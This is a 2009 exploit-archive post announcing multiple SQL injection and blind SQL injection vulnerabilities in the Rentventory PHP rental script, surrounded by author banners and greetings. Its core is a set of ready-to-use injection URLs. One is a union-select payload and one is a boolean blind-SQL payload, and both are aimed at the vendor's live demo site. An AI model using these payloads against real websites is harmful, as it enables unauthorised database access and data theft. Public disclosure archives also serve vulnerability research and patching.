[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Rentventory Multiple Remote SQL Injection Vulnerabilities
# Published : 2009-07-02
# Author : Moudi
# Previous Title : Opial 1.0 (albumid) Remote SQL Injection Vulnerability
# Next Title : Messages Library 2.0 Arbitrary Delete Message Vulnerability
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[??] ~Fleck i love you :D hahaha
==============================================================================
[??] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities
==============================================================================
[??] Script: [ Rentventory ]
[??] Language: [ PHP ]
[??] Download: [ http://www.rentventory.com/ ]
[??] Founder: [ Moudi or SixSo <m0udi@9.cn> ]
[??] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em man .... ]
[??] Team: [ EvilWay ]
[??] SiteWeb: [ Visit - www.opensc.ws ]
[??] Price: [ $39 ]
###########################################################################
===[ Exploit SQL ]===
[??] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time
===[ LIVE DEMO ]===
[??] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time
===[ Exploit BLIND SQL ]===
[??] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time
===[ LIVE DEMO ]===
[??] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time
Author: Moudi
###########################################################################
# www.Syue.com [2009-07-02]